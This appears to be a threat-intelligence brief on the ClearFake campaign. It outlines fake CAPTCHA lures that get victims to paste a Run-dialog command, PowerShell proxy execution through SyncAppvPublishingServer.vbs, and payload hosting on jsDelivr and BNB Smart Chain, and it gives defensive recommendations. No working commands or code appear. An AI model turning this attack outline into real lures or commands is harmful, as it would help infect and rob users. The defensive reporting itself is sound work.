ClearFake Campaign – Proxy Execution via Trusted Windows Feature

The ClearFake malware operation has evolved into a highly evasive delivery chain, combining fake CAPTCHA lures with proxy execution techniques that abuse legitimate Windows components to run malicious PowerShell commands.

Attack Flow

1. Compromised websites display a fake CAPTCHA challenge.
2. Victims are tricked into pressing Win + R and pasting clipboard content.
3. The command leverages SyncAppvPublishingServer.vbs (a legitimate Windows App-V script in System32).
4. This script acts as a proxy executor, passing malicious arguments into PowerShell.
5. Payloads are fetched from jsDelivr CDN and BNB Smart Chain smart contracts, making them appear legitimate and resilient against blocklists.
6. Malware establishes persistence, enabling data theft, remote access, or further payload deployment.

Why It’s Dangerous

• Living off the land tactics: No obvious malware files dropped; execution relies on trusted Windows features.
• Blockchain infrastructure: Operators use Ethereum-style smart contracts on the BNB Smart Chain testnet as resilient command centers.
• CDN hosting: Later-stage payloads delivered via jsDelivr, a widely trusted content delivery network.
• Stealth: Leaves little trace on disk, blends into normal network traffic.
• Scale: Analysts estimate ~150,000 infections based on unique IDs stored in the smart contract.

Technical Highlights

• Proxy execution: Abuse of SyncAppvPublishingServer.vbs to run malicious PowerShell commands.
• Obfuscated JavaScript loaders: Embedded in hacked sites, fetched dynamically from Web3 endpoints.
• Persistence: Payload loop maintains execution and can accept new instructions from C2.
• Geographic spread: Infections observed globally, with distribution mapped across multiple regions.

Defensive Recommendations

• User awareness: Train users to avoid copy-paste instructions from CAPTCHAs or pop-ups.
• Endpoint monitoring: Detect unusual use of SyncAppvPublishingServer.vbs and PowerShell proxy execution.
• Network defense: Inspect traffic to jsDelivr and Web3 endpoints for anomalies.
• Threat hunting: Look for clipboard manipulation and suspicious Run dialog activity.
• Block abuse: Restrict execution of App-V scripts if not required in enterprise environments.

Takeaway

ClearFake demonstrates how attackers are weaponizing trusted Windows features and blockchain/CDN infrastructure to evade detection. By blending social engineering with living-off-the-land techniques, this campaign poses a serious challenge for defenders, requiring behavioral monitoring and proactive awareness rather than reliance on traditional signature-based defenses.